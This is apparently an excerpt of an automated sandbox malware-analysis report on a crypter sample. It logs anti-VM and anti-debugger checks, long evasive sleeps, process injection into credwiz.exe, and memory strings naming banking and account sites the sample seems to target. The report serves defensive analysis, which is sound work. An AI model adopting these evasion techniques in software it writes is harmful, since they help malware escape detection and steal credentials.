Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.CrypterX-gen.112.10371.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ygTGgAEg.exe PID: 6140, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424ED324
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424ED7E4
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424ED944
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424ED504
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424ED544
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424ED1E4
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424F0154
Source: C:\Windows\SysWOW64\credwiz.exe API/Special instruction interceptor: Address: 7FFA424EDA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 2BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 2E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 2BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 7CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 8CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 8E60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: 9E60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: C00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: 27A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: C00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: 70B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: 80B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: 8250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Memory allocated: 9250000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017821AE rdtsc 5_2_017821AE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5708 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1675 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe API coverage: 0.4 %
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\credwiz.exe API coverage: 2.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe TID: 660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 720 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 500 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe TID: 3812 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6716 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\credwiz.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0041CAC0 FindFirstFileW,FindNextFileW,FindClose, 24_2_0041CAC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: Xd763ft.24.dr Binary or memory string: global block list test formVMware20,11696497155
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: svchost.exe, 0000000C.00000002.2286741046.00000197EEC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.21.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000000.00000002.1058972029.00000000070E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 0000000C.00000002.2288697976.00000197F4240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2288813627.00000197F4255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.21.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Xd763ft.24.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: Xd763ft.24.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: Xd763ft.24.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: Amcache.hve.21.dr Binary or memory string: vmci.sys
Source: Xd763ft.24.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: Xd763ft.24.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1
Source: Xd763ft.24.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: Xd763ft.24.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Xd763ft.24.dr Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.21.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Xd763ft.24.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.21.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: Xd763ft.24.dr Binary or memory string: outlook.office.comVMware20,11696497155s
Source: Xd763ft.24.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.21.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Xd763ft.24.dr Binary or memory string: dev.azure.comVMware20,11696497155j
Source: Xd763ft.24.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.21.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.21.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: Xd763ft.24.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: Xd763ft.24.dr Binary or memory string: tasks.office.comVMware20,11696497155o
Source: nYPOiVPQBw.exe, 0000001B.00000002.2285513053.0000000000979000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: Xd763ft.24.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Amcache.hve.21.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: firefox.exe, 0000001C.00000002.2260029052.000001690C78C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Xd763ft.24.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: Xd763ft.24.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.21.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Xd763ft.24.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: Xd763ft.24.dr Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Xd763ft.24.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}%X
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Xd763ft.24.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: Xd763ft.24.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: Xd763ft.24.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017821AE rdtsc 5_2_017821AE
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_016F2DF0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784164 mov eax, dword ptr fs:[00000030h] 5_2_01784164
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784164 mov eax, dword ptr fs:[00000030h] 5_2_01784164
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01748158 mov eax, dword ptr fs:[00000030h] 5_2_01748158
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01744144 mov eax, dword ptr fs:[00000030h] 5_2_01744144
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01744144 mov eax, dword ptr fs:[00000030h] 5_2_01744144
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01744144 mov ecx, dword ptr fs:[00000030h] 5_2_01744144
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01744144 mov eax, dword ptr fs:[00000030h] 5_2_01744144
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01744144 mov eax, dword ptr fs:[00000030h] 5_2_01744144
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016AC156 mov eax, dword ptr fs:[00000030h] 5_2_016AC156
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6154 mov eax, dword ptr fs:[00000030h] 5_2_016B6154
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6154 mov eax, dword ptr fs:[00000030h] 5_2_016B6154
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E0124 mov eax, dword ptr fs:[00000030h] 5_2_016E0124
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01770115 mov eax, dword ptr fs:[00000030h] 5_2_01770115
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175A118 mov ecx, dword ptr fs:[00000030h] 5_2_0175A118
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175A118 mov eax, dword ptr fs:[00000030h] 5_2_0175A118
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175A118 mov eax, dword ptr fs:[00000030h] 5_2_0175A118
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175A118 mov eax, dword ptr fs:[00000030h] 5_2_0175A118
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov eax, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov ecx, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov eax, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov eax, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov ecx, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov eax, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov eax, dword ptr fs:[00000030h] 5_2_0175E10E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175E10E mov ecx, dword ptr fs:[00000030h] 5_2_0175E10E
